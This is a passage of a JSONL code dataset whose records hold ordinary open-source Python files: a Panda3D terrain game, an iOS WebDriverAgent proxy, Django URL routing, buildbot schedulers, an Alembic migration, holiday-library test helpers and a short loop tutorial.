self.skybox.setLightOff()\n self.skybox.reparentTo(self.render)\n \n\n # Create the main character, Ralph\n\n # ralphStartPos = self.environ.find(\"**/start_point\").getPos()\n ralphStartPosX = 100\n ralphStartPosY = 100 \n ralphStartPosZ = self.terrain.getElevation(ralphStartPosX, ralphStartPosY) * root.getSz()\n \n self.ralph = Actor(\"ralph\", {\"run\":\"ralph-run\", \"walk\":\"ralph-walk\"})\n self.ralph.reparentTo(self.render)\n self.ralph.setScale(.2)\n self.ralph.setPos(ralphStartPosX, ralphStartPosY, ralphStartPosZ)\n\n self.skybox.setPos(ralphStartPosX, ralphStartPosY, ralphStartPosZ)\n\n # Create a floater object. We use the \"floater\" as a temporary\n # variable in a variety of calculations.\n \n self.floater = NodePath(PandaNode(\"floater\"))\n self.floater.reparentTo(self.render)\n\n # Set the current viewing target for the mouse based controls\n self.focus = Vec3(ralphStartPosX, ralphStartPosY + 10, ralphStartPosZ + 2)\n self.heading = 180\n self.pitch = 0\n self.mousex = 0\n self.mousey = 0\n self.last = 0\n self.mousebtn = [0, 0, 0]\n\n # Accept the control keys for movement and rotation\n\n self.accept(\"escape\", sys.exit)\n self.accept(\"arrow_left\", self.setKey, [\"cam-left\", 1])\n self.accept(\"arrow_right\", self.setKey, [\"cam-right\", 1])\n self.accept(\"arrow_up\", self.setKey, [\"cam-up\", 1])\n self.accept(\"arrow_down\", self.setKey, [\"cam-down\", 1])\n self.accept(\"w\", self.setKey, [\"forward\", 1])\n self.accept(\"a\", self.setKey, [\"left\", 1])\n self.accept(\"d\", self.setKey, [\"right\", 1])\n \n self.accept(\"arrow_left-up\", self.setKey, [\"cam-left\", 0])\n self.accept(\"arrow_right-up\", self.setKey, [\"cam-right\", 0])\n self.accept(\"arrow_up-up\", self.setKey, [\"cam-up\", 0])\n self.accept(\"arrow_down-up\", self.setKey, [\"cam-down\", 0])\n self.accept(\"w-up\", self.setKey, [\"forward\", 0])\n self.accept(\"a-up\", self.setKey, [\"left\", 0])\n self.accept(\"d-up\", self.setKey, [\"right\", 0])\n\n # mouse controls\n self.accept(\"mouse1\", self.setMouseBtn, [0, 1])\n self.accept(\"mouse1-up\", self.setMouseBtn, [0, 0])\n self.accept(\"mouse2\", self.setMouseBtn, [1, 1])\n self.accept(\"mouse2-up\", self.setMouseBtn, [1, 0])\n self.accept(\"mouse3\", self.setMouseBtn, [2, 1])\n self.accept(\"mouse3-up\", self.setMouseBtn, [2, 0])\n\n # ---- tasks -------------------------------------\n # ralph movement\n self.taskMgr.add(self.move, \"moveTask\")\n # Add a task to keep updating the terrain\n self.taskMgr.add(self.terrain.update, \"update\")\n # mouse camera movement\n self.taskMgr.add(self.controlCamera, \"camera-task\")\n\n # Game state variables\n self.prevtime = 0\n self.isMoving = False\n\n # disable std. mouse\n self.disableMouse()\n props = WindowProperties()\n props.setCursorHidden(True)\n self.win.requestProperties(props)\n\n # Set up the camera\n self._setup_camera()\n self.camera.setPos(self.ralph.getX(), self.ralph.getY() + 10, 2)\n \n # We will detect the height of the terrain by creating a collision\n # ray and casting it downward toward the terrain. One ray will\n # start above ralph's head, and the other will start above the camera.\n # A ray may hit the terrain, or it may hit a rock or a tree. If it\n # hits the terrain, we can detect the height. If it hits anything\n # else, we rule that the move is illegal.\n\n self.cTrav = CollisionTraverser()\n\n self.ralphGroundRay = CollisionRay()\n self.ralphGroundRay.setOrigin(0, 0, 1000)\n self.ralphGroundRay.setDirection(0, 0, -1)\n self.ralphGroundCol = CollisionNode('ralphRay')\n self.ralphGroundCol.addSolid(self.ralphGroundRay)\n self.ralphGroundCol.setFromCollideMask(BitMask32.bit(0))\n self.ralphGroundCol.setIntoCollideMask(BitMask32.allOff())\n self.ralphGroundColNp = self.ralph.attachNewNode(self.ralphGroundCol)\n self.ralphGroundHandler = CollisionHandlerQueue()\n self.cTrav.addCollider(self.ralphGroundColNp, self.ralphGroundHandler)\n\n self.camGroundRay = CollisionRay()\n self.camGroundRay.setOrigin(0, 0, 1000)\n self.camGroundRay.setDirection(0, 0, -1)\n self.camGroundCol = CollisionNode('camRay')\n self.camGroundCol.addSolid(self.camGroundRay)\n self.camGroundCol.setFromCollideMask(BitMask32.bit(0))\n self.camGroundCol.setIntoCollideMask(BitMask32.allOff())\n self.camGroundColNp = self.camera.attachNewNode(self.camGroundCol)\n self.camGroundHandler = CollisionHandlerQueue()\n self.cTrav.addCollider(self.camGroundColNp, self.camGroundHandler)\n\n # Uncomment this line to see the collision rays\n # self.ralphGroundColNp.show()\n # self.camGroundColNp.show()\n \n #Uncomment this line to show a visual representation of the \n #collisions occuring\n # self.cTrav.showCollisions(render)\n \n\n \n #Records the state of the arrow keys\n def setKey(self, key, value):\n self.keyMap[key] = value\n \n\n # Accepts arrow keys to move either the player or the menu cursor,\n # Also deals with grid checking and collision detection\n def move(self, task):\n\n elapsed = task.time - self.prevtime\n\n # If the camera-left key is pressed, move camera left.\n # If the camera-right key is pressed, move camera right.\n\n self.camera.lookAt(self.ralph)\n camright = self.camera.getNetTransform().getMat().getRow3(0)\n camright.normalize()\n if (self.keyMap[\"cam-left\"] != 0):\n self.camera.setPos(self.camera.getPos() - camright * (elapsed * 20))\n if (self.keyMap[\"cam-right\"] != 0):\n self.camera.setPos(self.camera.getPos() + camright * (elapsed * 20))\n if (self.keyMap[\"cam-up\"] != 0):\n self.camera.setZ(self.camera.getZ() + elapsed * 10)\n if (self.keyMap[\"cam-down\"] != 0):\n self.camera.setZ(self.camera.getZ() - elapsed * 10)\n\n # save ralph's initial position so that we can restore it,\n # in case he falls off the map or runs into something.\n\n startpos = self.ralph.getPos()\n\n # If a move-key is pressed, move ralph in the specified direction.\n\n if (self.keyMap[\"left\"] != 0):\n self.ralph.setH(self.ralph.getH() + elapsed * 300)\n if (self.keyMap[\"right\"] != 0):\n self.ralph.setH(self.ralph.getH() - elapsed * 300)\n if (self.keyMap[\"forward\"] != 0):\n backward = self.ralph.getNetTransform().getMat().getRow3(1)\n backward.setZ(0)\n backward.normalize()\n self.ralph.setPos(self.ralph.getPos() - backward * (elapsed * 5))\n\n # If ralph is moving, loop the run animation.\n # If he is standing still, stop the animation.\n\n if (self.keyMap[\"forward\"] != 0) or (self.keyMap[\"left\"] != 0) or (self.keyMap[\"right\"] != 0):\n if self.isMoving is False:\n self.ralph.loop(\"run\")\n self.isMoving = True\n else:\n if self.isMoving:\n self.ralph.stop()\n self.ralph.pose(\"walk\", 5)\n self.isMoving = False\n\n # If the camera is too far from ralph, move it closer.\n # If the camera is too close to ralph, move it farther.\n\n camvec = self.ralph.getPos() - self.camera.getPos()\n camvec.setZ(0)\n camdist = camvec.length()\n camvec.normalize()\n if (camdist > 10.0):\n self.camera.setPos(self.camera.getPos() + camvec * (camdist - 10))\n camdist = 10.0\n if (camdist < 5.0):\n self.camera.setPos(self.camera.getPos() - camvec * (5 - camdist))\n camdist = 5.0\n\n # Now check for collisions.\n '''\n self.cTrav.traverse(render)\n\n # Adjust ralph's Z coordinate. If ralph's ray hit terrain,\n # update his Z. If it hit anything else, or didn't hit anything, put\n # him back where he was last frame.\n\n entries = []\n for i in range(self.ralphGroundHandler.getNumEntries()):\n entry = self.ralphGroundHandler.getEntry(i)\n entries.append(entry)\n entries.sort(lambda x,y: cmp(y.getSurfacePoint(render).getZ(),\n x.getSurfacePoint(render).getZ()))\n if (len(entries)>0) and (entries[0].getIntoNode().getName() == \"terrain\"):\n self.ralph.setZ(entries[0].getSurfacePoint(render).getZ())\n else:\n self.ralph.setPos(startpos)\n '''\n \n # just use terrain height\n x = self.ralph.getX()\n y = self.ralph.getY()\n self.ralph.setZ(self.terrain.getElevation(x, y) * self.terrain.getRoot().getSz())\n \n # loc output\n self.loc_text.setText('[LOC] : %03.2f, %03.2f,%03.2f ' % \\\n (self.ralph.getX(), self.ralph.getY(), self.ralph.getZ()))\n \n \n # Keep the camera at one foot above the terrain,\n # or two feet above ralph, whichever is greater.\n \n entries = []\n for i in range(self.camGroundHandler.getNumEntries()):\n entry = self.camGroundHandler.getEntry(i)\n entries.append(entry)\n entries.sort(lambda x, y: cmp(y.getSurfacePoint(self.render).getZ(),\n x.getSurfacePoint(self.render).getZ()))\n if (len(entries) > 0) and (entries[0].getIntoNode().getName() == \"terrain\"):\n self.camera.setZ(entries[0].getSurfacePoint(self.render).getZ() + .1)\n if (self.camera.getZ() < self.ralph.getZ() + .5):\n self.camera.setZ(self.ralph.getZ() + .5)\n # if (base.camera.getZ() > self.ralph.getZ() + 2.0):\n # base.camera.setZ(self.ralph.getZ() + 2.0)\n \n # The camera should look in ralph's direction,\n # but it should also try to stay horizontal, so look at\n # a floater which hovers above ralph's head.\n \n self.floater.setPos(self.ralph.getPos())\n self.floater.setZ(self.ralph.getZ() + 2.0)\n self.camera.lookAt(self.floater)\n \n # Store the task time and continue.\n self.prevtime = task.time\n return Task.cont\n\n # mouse controled main camera\n def controlCamera(self, task):\n # figure out how much the mouse has moved (in pixels)\n md = self.win.getPointer(0)\n x = md.getX()\n y = md.getY()\n if self.win.movePointer(0, 100, 100):\n self.heading = self.heading - (x - 100) * 0.2\n self.pitch = self.pitch - (y - 100) * 0.2\n if (self.pitch < -89): self.pitch = -89\n if (self.pitch > 89): self.pitch = 89\n self.camera.setHpr(self.heading, self.pitch, 0)\n dir = self.camera.getMat().getRow3(1)\n elapsed = task.time - self.last\n if (self.last == 0): elapsed = 0\n if (self.mousebtn[0]):\n self.focus = self.focus + dir * elapsed * 30\n if (self.mousebtn[1]) or (self.mousebtn[2]):\n self.focus = self.focus - dir * elapsed * 30\n self.camera.setPos(self.focus - (dir * 5))\n\n # Time for water distortions\n self.render.setShaderInput('time', task.time)\n\n # move the skybox with the camera\n campos = self.camera.getPos()\n self.skybox.setPos(campos)\n\n # update matrix of the reflection camera\n mc = self.camera.getMat()\n mf = self.waterPlane.getReflectionMat()\n self.watercamNP.setMat(mc * mf)\n\n self.focus = self.camera.getPos() + (dir * 5)\n self.last = task.time\n return Task.cont\n\n\nif __name__ == '__main__':\n print('instancing world...')\n w = World()\n\n print('calling run()...')\n w.run()\n","sub_path":"contribs/Yarr.py","file_name":"Yarr.py","file_ext":"py","file_size_in_byte":22201,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"61393997","text":"#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\nimport requests\nimport six\nimport time\nimport json\nimport base64\nimport wda\nfrom deval.utils.cv import *\nfrom deval.component.ios.utils.constant import CAP_METHOD, TOUCH_METHOD, IME_METHOD\nfrom deval.component.ios.utils.rotation import XYTransformer, RotationWatcher\nfrom deval.component.ios.utils.fake_minitouch import fakeMiniTouch\nfrom deval.component.ios.utils.instruct_helper import InstructHelper\nfrom deval.utils.logger import get_logger\nfrom deval.utils.parse import parse_uri\nfrom wda import LANDSCAPE, PORTRAIT, LANDSCAPE_RIGHT, PORTRAIT_UPSIDEDOWN\nfrom wda import WDAError\nif six.PY3:\n from urllib.parse import urljoin\nelse:\n from urlparse import urljoin\n\n\nlogger = get_logger(__name__)\nDEFAULT_ADDR = \"http://localhost:8100/\"\n\n\n# retry when saved session failed\ndef retry_session(func):\n def wrapper(self, *args, **kwargs): \n try:\n return func(self, *args, **kwargs)\n except WDAError as err:\n # 6 : Session does not exist\n if err.status == 6:\n self._fetchNewSession()\n return func(self, *args, **kwargs)\n else:\n raise err\n return wrapper\n\n\ndef check_platform_ios(uri, platform=\"ios\"):\n \"\"\"\n Check the uri and return a dictionary containing the various parameters contained in the uri.\n\n Parameters:\n uri - an URI where to connect to device, e.g. `ios:///`\n\n Returns:\n A dictionary containing the various parameters contained in the uri.\n\n Raises:\n RuntimeError - raise when the platform does not match the uri.\n \"\"\"\n params = parse_uri(uri)\n if params[\"platform\"] != platform:\n raise RuntimeError(\"Platform error!\")\n if \"uuid\" in params:\n params[\"addr\"] = params[\"uuid\"]\n params.pop(\"uuid\")\n params.pop(\"platform\")\n return params\n\n\n# copy from airtest\nclass IOSProxy(object):\n \"\"\"ios client\n # befor this you have to run WebDriverAgent\n # xcodebuild -project path/to/WebDriverAgent.xcodeproj -scheme WebDriverAgentRunner -destination \"id=$(idevice_id -l)\" test\n # iproxy $port 8100 $udid\n \"\"\"\n\n def __init__(self, addr=DEFAULT_ADDR):\n super(IOSProxy, self).__init__()\n\n # if none or empty, use default addr\n self.addr = addr or DEFAULT_ADDR\n\n # fit wda format, make url start with http://\n if not self.addr.startswith(\"http://\"):\n self.addr = \"http://\" + addr\n\n \"\"\"here now use these supported cap touch and ime method\"\"\"\n self.cap_method = CAP_METHOD.WDACAP\n self.touch_method = TOUCH_METHOD.WDATOUCH\n self.ime_method = IME_METHOD.WDAIME\n\n # wda driver, use to home, start app\n # init wda session, updata when start app\n # use to click/swipe/close app/get wda size\n wda.DEBUG = False\n self.driver = wda.Client(self.addr)\n\n # record device's width\n self._size = {'width': None, 'height': None}\n self._touch_factor = 0.5\n self._last_orientation = None\n self.defaultSession = None\n\n # start up RotationWatcher with default session\n self.rotation_watcher = RotationWatcher(self)\n\n # fake minitouch to simulate swipe\n self.minitouch = fakeMiniTouch(self)\n\n # helper of run process like iproxy\n self.instruct_helper = InstructHelper()\n\n @property\n def session(self):\n if not self.defaultSession:\n self.defaultSession = self.driver.session()\n return self.defaultSession\n\n def _fetchNewSession(self):\n self.defaultSession = self.driver.session()\n\n @retry_session\n def window_size(self):\n \"\"\"\n return window size\n namedtuple:\n Size(wide , hight)\n \"\"\"\n return self.session.window_size()\n\n @property\n @retry_session\n def orientation(self):\n \"\"\"\n return device oritantation status\n in LANDSACPE POR\n \"\"\"\n return self.session.orientation\n\n @property\n def display_info(self):\n if not self._size['width'] or not self._size['height']:\n self.snapshot()\n return {'width': self._size['width'], 'height': self._size['height'], 'orientation': self.orientation, 'physical_width': self._size['width'], 'physical_height': self._size['height']}\n\n def snapshot(self, filename=None, strType=False, ensure_orientation=True):\n \"\"\"\n take snapshot\n filename: save screenshot to filename\n \"\"\"\n data = None\n\n if self.cap_method == CAP_METHOD.MINICAP:\n raise NotImplementedError\n elif self.cap_method == CAP_METHOD.MINICAP_STREAM:\n raise NotImplementedError\n elif self.cap_method == CAP_METHOD.WDACAP:\n data = self._neo_wda_screenshot() # wda 截图���用考虑朝向\n\n if strType:\n if filename:\n with open(filename, 'wb') as f:\n f.write(data)\n return data\n\n # output cv2 object\n try:\n screen = string_2_img(data)\n except:\n # may be black/locked screen or other reason, print exc for debugging\n import traceback\n traceback.print_exc()\n return None\n\n now_orientation = self.orientation\n\n # ensure the orientation is right\n if ensure_orientation and now_orientation in [LANDSCAPE, LANDSCAPE_RIGHT]:\n\n # minicap screenshots are different for various sdk_version\n if self.cap_method in (CAP_METHOD.MINICAP, CAP_METHOD.MINICAP_STREAM):\n h, w = screen.shape[:2] # cvshape是高度在前面!!!!\n if w < h: # 当前是横屏,但是图片是竖的,则旋转,针对sdk<=16的机器\n screen = rotate(screen, self.display_info[\"orientation\"] * 90, clockwise=False)\n\n # wda 截图是要根据orientation旋转\n elif self.cap_method == CAP_METHOD.WDACAP:\n # seems need to rotate in opencv opencv-contrib-python==3.2.0.7\n screen = rotate(screen, 90, clockwise=(now_orientation == LANDSCAPE_RIGHT))\n\n # readed screen size\n h, w = screen.shape[:2]\n\n # save last res for portrait\n if now_orientation in [LANDSCAPE, LANDSCAPE_RIGHT]:\n self._size['height'] = w\n self._size['width'] = h\n else:\n self._size['height'] = h\n self._size['width'] = w\n\n winw, winh = self.window_size()\n\n self._touch_factor = float(winh) / float(h)\n\n # save as file if needed\n if filename:\n imwrite(filename, screen)\n\n return screen\n\n def _neo_wda_screenshot(self):\n \"\"\"\n this is almost same as wda implementation, but without png header check,\n as response data is now jpg format in mid quality\n \"\"\"\n value = self.driver.http.get('screenshot').value\n raw_value = base64.b64decode(value)\n return raw_value\n\n def _touch_point_by_orientation(self, tuple_xy):\n \"\"\"\n Convert image coordinates to physical display coordinates, the arbitrary point (origin) is upper left corner\n of the device physical display\n\n Args:\n tuple_xy: image coordinates (x, y)\n\n Returns:\n\n \"\"\"\n x, y = tuple_xy\n\n # use correct w and h due to now orientation\n # _size 只对应竖直时候长宽\n now_orientation = self.orientation\n\n if now_orientation in [PORTRAIT, PORTRAIT_UPSIDEDOWN]:\n width, height = self._size['width'], self._size[\"height\"]\n else:\n height, width = self._size['width'], self._size[\"height\"]\n\n # check if not get screensize when touching\n if not width or not height:\n # use snapshot to get current resuluton\n self.snapshot()\n\n x, y = XYTransformer.up_2_ori(\n (x, y),\n (width, height),\n now_orientation\n )\n return x, y\n","sub_path":"deval/component/ios/utils/iosfuncs.py","file_name":"iosfuncs.py","file_ext":"py","file_size_in_byte":8176,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"279929703","text":"from django.conf.urls import patterns, include, url\r\n\r\n# Uncomment the next two lines to enable the admin:\r\nfrom websites.content import views\r\nfrom django.contrib import admin\r\nadmin.autodiscover()\r\n\r\nfrom django.conf import settings\r\n\r\nurlpatterns = patterns('',\r\n url(r'^admin/', include(admin.site.urls)),\r\n url(r'^kustomz/$','websites.content.views.contact'),\r\n)\r\n\r\nif settings.REGISTER: \r\n urlpatterns += patterns('',\r\n url(r'^accounts/login/$','django.contrib.auth.views.login', {'template_name': 'login.html'}),\r\n url(r'^accounts/logout/$','django.contrib.auth.views.logout',{'template_name':'logout.html'}),\r\n url(r'^accounts/register/$','websites.content.views.register'), \r\n )\r\n\r\nif settings.SHOPPING:\r\n urlpatterns += patterns('',\r\n url(r'^section/(?P\\w+)/$','websites.shopping.views.section'),\r\n url(r'^detail/(?P\\d+)/$','websites.shopping.views.detail'),\r\n )\r\n\r\nif settings.TWITTER: \r\n urlpatterns += patterns('',\r\n url(r'^authorize/', 'websites.content.views.authorize_twitter'),\r\n url(r'^tlogin/','websites.content.views.twitter_login'),\r\n )\r\n\r\nif settings.LANDING: \r\n urlpatterns += patterns('', \r\n url(r'^$', 'django.views.generic.simple.direct_to_template', {'template':'landing.html'}), \r\n url(r'^home/$', views.index)\r\n )\r\n\r\nelse: \r\n urlpatterns += patterns('',\r\n url(r'^$', views.index)\r\n )\r\n\r\nif settings.DEBUG:\r\n urlpatterns += patterns('',\r\n (r'^assets/(?P.*)$', 'django.views.static.serve', {'document_root': \"/Users/ball6862/Github/Sites/django_apps/media/jakore/\", 'show_indexes':True}),\r\n)\r\n","sub_path":"django_apps/websites/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"274112072","text":"import re\n\nimport boto.ec2\nimport boto.vpc\nimport boto.route53\n\n\nclass EC2(object):\n\n def __init__(self, environment, security_group):\n self.environment = environment\n self.security_group = security_group\n\n instance_metadata = boto.utils.get_instance_metadata()\n\n self.instance_id = instance_metadata['instance-id']\n self.aws_zone = instance_metadata['placement']['availability-zone']\n self.aws_region = re.sub(r'[ab]$', '', self.aws_zone)\n\n self.ec2 = boto.ec2.connect_to_region(self.aws_region)\n self.vpc = boto.vpc.connect_to_region(self.aws_region)\n self.route53 = boto.route53.Route53Connection()\n","sub_path":"aws_utils/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":668,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"325667774","text":"schedulers = []\n\nfrom buildbot.schedulers.basic import SingleBranchScheduler\nfrom buildbot.schedulers.forcesched import ForceScheduler, FixedParameter, StringParameter, ChoiceStringParameter\n\nfrom buildbot.schedulers.timed import Periodic\nfrom buildbot.schedulers.trysched import Try_Userpass\nfrom metabbotcfg.slaves import slaves\nfrom metabbotcfg import builders\n\nfrom metabbotcfg.debian import schedulers as deb_schedulers\n\nschedulers.append(SingleBranchScheduler(name=\"all\", branch='master',\n treeStableTimer=10,\n builderNames=[ b['name'] for b in builders.master_builders ]))\n\nschedulers.append(SingleBranchScheduler(name=\"release\", branch='buildbot-0.8.9',\n treeStableTimer=10,\n builderNames=[ b['name'] for b in builders.master_builders if b['name'] not in ('docs',) ]))\n\nschedulers.append(SingleBranchScheduler(name=\"nine\", branch='nine',\n treeStableTimer=5,\n builderNames=[ b['name'] for b in builders.nine_builders ]))\n\nschedulers.append(ForceScheduler(name=\"force\",\n repository=FixedParameter(name=\"repository\", default='git://github.com/buildbot/buildbot.git'),\n branch=ChoiceStringParameter(name=\"branch\", default=\"master\", choices=[\"master\", \"nine\"]),\n project=FixedParameter(name=\"project\", default=\"\"),\n properties=[],\n builderNames=[ b['name'] for b in builders.master_builders ]))\n\nschedulers += deb_schedulers\n","sub_path":"schedulers.py","file_name":"schedulers.py","file_ext":"py","file_size_in_byte":1509,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"84359809","text":"\"\"\"s=\"python\"\r\nfor eleman in range(6):\r\n if eleman % 2 == 0:\r\n print(s[eleman])\"\"\"\r\n\r\n\"\"\"for i in \"python\"[::2]:\r\n print(i,end=\" \")\"\"\"\r\n\r\n\r\n #range fonksiyonu \r\n#kullanım\r\n#print(*range(0,10))\r\n\r\n#geri sayım\r\n#print(*range(20,0,-2))\r\n\r\n#---------------------------------------\r\n\r\n#list comprenhesion\r\n\r\n\"\"\"list1=[1,234,56]\r\n\r\nlist2=list()\r\n\r\nfor i in list1:\r\n list2.append(i)\r\nprint(list2)\"\"\"\r\n\r\n\r\n\r\n#LİST COMPREHENSİON \r\nlis5=[1,2,3,4,5]\r\nlist4= [i for i in lis5]\r\n#sagdan basla burdan okumaya\r\nprint(list4)\r\n\r\n\"\"\"liste1 = [1,2,3,4,5]\r\nliste2 = list(liste1)\r\n \r\nprint(liste2)\"\"\"\r\n#aktarım su sekilde de oluyor.\r\n\r\n\"\"\"\r\ns=\"java\"\r\nlist2= [i*3 for i in s]\r\n#s içindeki elemanları 3le list2'ye ekle\r\nprint(list2)\"\"\"\r\n\r\n\r\n","sub_path":"loops.py","file_name":"loops.py","file_ext":"py","file_size_in_byte":745,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"417794383","text":"\"\"\"Add social fields\n\nRevision ID: 2c423286568f\nRevises: 1570277296f2\nCreate Date: 2020-09-16 12:45:33.692464\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import postgresql\n\n# revision identifiers, used by Alembic.\nrevision = '2c423286568f'\ndown_revision = '1570277296f2'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('societies', sa.Column('socials', sa.JSON(), nullable=False, server_default=\"[]\"))\n op.alter_column('societies', 'sessions',\n existing_type=postgresql.JSON(astext_type=sa.Text()),\n nullable=True,\n existing_server_default=sa.text(\"'[]'::json\"))\n op.drop_column('societies', 'social_2')\n op.drop_column('societies', 'social_1')\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('societies', sa.Column('social_1', sa.VARCHAR(), autoincrement=False, nullable=True))\n op.add_column('societies', sa.Column('social_2', sa.VARCHAR(), autoincrement=False, nullable=True))\n op.alter_column('societies', 'sessions',\n existing_type=postgresql.JSON(astext_type=sa.Text()),\n nullable=False,\n existing_server_default=sa.text(\"'[]'::json\"))\n op.drop_column('societies', 'socials')\n # ### end Alembic commands ###\n","sub_path":"migrations/versions/2c423286568f_add_social_fields.py","file_name":"2c423286568f_add_social_fields.py","file_ext":"py","file_size_in_byte":1434,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"13465799","text":"# python-holidays\n# ---------------\n# A fast, efficient Python library for generating country, province and state\n# specific sets of holidays on the fly. It aims to make determining whether a\n# specific date is a holiday as fast and flexible as possible.\n#\n# Authors: dr-prodigy (c) 2017-2023\n# ryanss (c) 2014-2017\n# Website: https://github.com/dr-prodigy/python-holidays\n# License: MIT (see LICENSE file)\n\nimport unittest\nfrom typing import Generator\n\nfrom dateutil.parser import parse\n\nfrom holidays import HolidayBase\nfrom holidays.constants import SUN\n\n\nclass TestCase(unittest.TestCase):\n \"\"\"Base class for python-holiday test cases.\"\"\"\n\n def _parse_arguments(self, args, expand_items=True):\n item_args = args\n instance = None\n\n if issubclass(args[0].__class__, HolidayBase):\n instance = args[0]\n item_args = args[1:]\n else:\n try:\n instance = getattr(self, \"holidays\")\n self.assertTrue(\n issubclass(instance.__class__, HolidayBase),\n \"The `self.holidays` must be a `HolidayBase` subclass.\",\n )\n except AttributeError:\n raise ValueError(\n \"Either pass a holidays object (`HolidayBase` subclass) \"\n \"as a first argument or initialize `self.holidays` in the \"\n \"`setUp()` method.\"\n )\n\n items = []\n if expand_items:\n for item_arg in item_args:\n if type(item_arg) in {list, tuple}:\n items.extend(item_arg)\n elif expand_items and isinstance(item_arg, Generator):\n items.extend(tuple(item_arg))\n else:\n items.append(item_arg)\n else:\n items.extend(item_args)\n\n return instance, items\n\n def _verify_type(self, holidays):\n self.assertTrue(\n issubclass(holidays.__class__, HolidayBase),\n \"`holidays` object must be a subclass of `HolidayBase`\",\n )\n\n def assertCountryAliases(self, cls, alpha_2, alpha_3):\n \"\"\"Assert country aliases match.\"\"\"\n\n self.assertTrue(\n issubclass(cls, HolidayBase),\n \"Country holidays object must be a subclass of `HolidayBase`\",\n )\n\n type_error_message = (\n \"Country alias object must be a subclass of the country class.\"\n )\n for alias in (alpha_2, alpha_3):\n self.assertIsNotNone(alias, type_error_message)\n self.assertTrue(issubclass(alias, cls), type_error_message)\n\n length_error_message = (\n \"This method accepts exactly 3 arguments \"\n \"in this specific order: country base class, country alpha-2 \"\n \"alias, and country alpha-3 alias. For example: \"\n \"`self.assertCountryAliases(UnitedStates, US, USA)`\"\n )\n if len(alpha_2.__name__) != 2:\n raise ValueError(\n f\"{length_error_message}. Alias `{alpha_2.__name__}` doesn't \"\n \"look like alpha-2 country code.\"\n )\n\n if len(alpha_3.__name__) != 3:\n raise ValueError(\n f\"{length_error_message}. Alias `{alpha_3.__name__}` doesn't \"\n \"look like alpha-3 country code.\"\n )\n\n def assertHoliday(self, *args):\n \"\"\"Assert each date is a holiday.\"\"\"\n\n holidays, dates = self._parse_arguments(args)\n for dt in dates:\n self.assertIn(dt, holidays, dt)\n\n def assertHolidayDates(self, *args):\n \"\"\"Assert holiday dates exactly match expected dates.\"\"\"\n\n holidays, dates = self._parse_arguments(args)\n self._verify_type(holidays)\n\n for dt in dates: # Check one by one for descriptive error messages.\n self.assertIn(dt, holidays, dt)\n\n self.assertEqual(\n len(dates),\n len(holidays.keys()),\n set(dates).difference(holidays.keys()),\n )\n\n def assertHolidayName(self, name, *args):\n \"\"\"Assert a holiday with a specific name exists.\"\"\"\n\n holidays, _ = self._parse_arguments(args)\n self.assertEqual(\n len(holidays.years), len(holidays.get_named(name)), name\n )\n\n def assertHolidays(self, *args):\n \"\"\"Assert holidays exactly match expected holidays.\"\"\"\n\n holidays, expected_holidays = self._parse_arguments(\n args, expand_items=False\n )\n self._verify_type(holidays)\n\n # Check one by one for descriptive error messages.\n for dt, name in expected_holidays:\n self.assertIn(dt, holidays)\n self.assertEqual(name, holidays.get(dt), dt)\n\n self.assertEqual(\n len(holidays),\n len(expected_holidays),\n set(\n (dt.strftime(\"%Y-%m-%d\"), name)\n for dt, name in holidays.items()\n ).difference((dt, name) for dt, name in expected_holidays),\n )\n\n def assertHolidaysName(self, name, *args):\n \"\"\"Assert each holiday name matches an expected one.\"\"\"\n\n holidays, dates = self._parse_arguments(args)\n for dt in dates:\n self.assertIn(name, holidays.get_list(dt))\n\n def assertNoHoliday(self, *args):\n \"\"\"Assert each date is not a holiday.\"\"\"\n\n holidays, dates = self._parse_arguments(args)\n for dt in dates:\n self.assertNotIn(dt, holidays, dt)\n\n def assertNoHolidayName(self, name, *args):\n \"\"\"Assert a holiday with a specific name doesn't exist.\"\"\"\n\n holidays, _ = self._parse_arguments(args)\n self.assertFalse(holidays.get_named(name), name)\n\n def assertNoHolidays(self, holidays):\n \"\"\"Assert holidays dict is empty.\"\"\"\n\n self._verify_type(holidays)\n\n self.assertFalse(holidays)\n self.assertEqual(0, len(holidays))\n\n\nclass SundayHolidays(TestCase):\n \"\"\"Common class to test countries with Sundays as a holidays.\"\"\"\n\n def assertSundays(self, cls):\n holidays = cls(years=1989, include_sundays=True)\n self.assertHoliday(\n holidays,\n \"1989-12-31\",\n )\n self.assertEqual(53, len([s for s in holidays if s.weekday() == SUN]))\n\n holidays = cls(years=2032, include_sundays=True)\n self.assertHoliday(\n holidays,\n \"2032-01-04\",\n )\n self.assertEqual(52, len([s for s in holidays if s.weekday() == SUN]))\n\n self.assertNoHolidays(cls(include_sundays=True))\n\n for sunday in (\n \"1989-12-31\",\n \"2017-02-05\",\n \"2017-02-12\",\n \"2032-02-29\",\n ):\n self.assertEqual(parse(sunday).weekday(), SUN)\n self.assertHoliday(holidays, sunday)\n\n for non_sunday in (\n \"2001-05-16\",\n \"2001-05-18\",\n \"2016-12-27\",\n \"2016-12-28\",\n \"2017-02-06\",\n \"2017-02-07\",\n \"2017-02-08\",\n \"2017-02-09\",\n \"2017-02-10\",\n ):\n self.assertNotEqual(parse(non_sunday).weekday(), SUN)\n self.assertNoHoliday(holidays, non_sunday)\n","sub_path":"tests/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":7269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"170548382","text":"import datetime as dt\nimport pandas as pd\nimport numpy as np\nimport pandas_datareader as pdr\nimport matplotlib.pyplot as 